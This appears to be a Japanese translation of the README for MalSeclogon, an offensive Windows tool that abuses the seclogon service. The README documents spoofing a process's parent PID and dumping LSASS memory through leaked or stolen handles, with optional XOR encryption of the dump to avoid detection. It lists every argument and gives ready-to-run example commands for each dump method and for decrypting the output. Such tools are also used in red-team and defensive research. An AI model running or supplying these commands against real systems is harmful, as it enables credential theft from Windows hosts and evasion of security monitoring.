
Seclogon サービスで遊ぶための小さなツール
Seclogon サービスを操作するための小さなツールです。
技術的な詳細はこちら:
MalSeclogon v0.2
@splinter_code
引数:
-p seclogon サービスを通じて PPID を偽装するプロセスの PID
-d lsass ダンプ方法
1 = 漏洩したハンドルを使用して lsass をダンプ
2 = 漏洩したハンドルとクローン化された lsass プロセスを使用して lsass をダンプ
3 = seclogon からハンドルを盗んで lsass をダンプ(デフォルト)
-o ダンプの出力パス(デフォルト C:\lsass.dmp)
-c 偽装プロセスのコマンドライン、デフォルト: cmd.exe(-d とは互換性なし)
-k ダンプを暗号化する XOR キー。-d 3 とのみ互換性あり。許容値 1~255。デフォルト = 40。
-f 暗号化されたダンプファイルのパス。ダンプを復号します。-k キーが指定されていない場合、デフォルト値は 40 です。
例:
- 偽装された PPID でプロセスを実行:
Malseclogon.exe -p [PPID] -c cmd.exe
- 漏洩したハンドルを使用して lsass をダンプ:
Malseclogon.exe -d 1
- 漏洩したハンドルとクローン化された lsass プロセスを使用して lsass をダンプ:
Malseclogon.exe -d 2
- XOR キー 40 を使用して seclogon からハンドルを盗んで lsass をダンプ:
Malseclogon.exe -d 3 -o C:\lsass.dmp.xor -k 40
- キー 40 で lsass dmp ファイルを復号:
Malseclogon.exe -f C:\lsass.dmp.xor -k 40
「Debug」または「x86」リリースはビルドしないでください。これらのビルドを使用すると、コンパイルされたバイナリは動作しません。 使用する正しいビルドは「Release x64」です。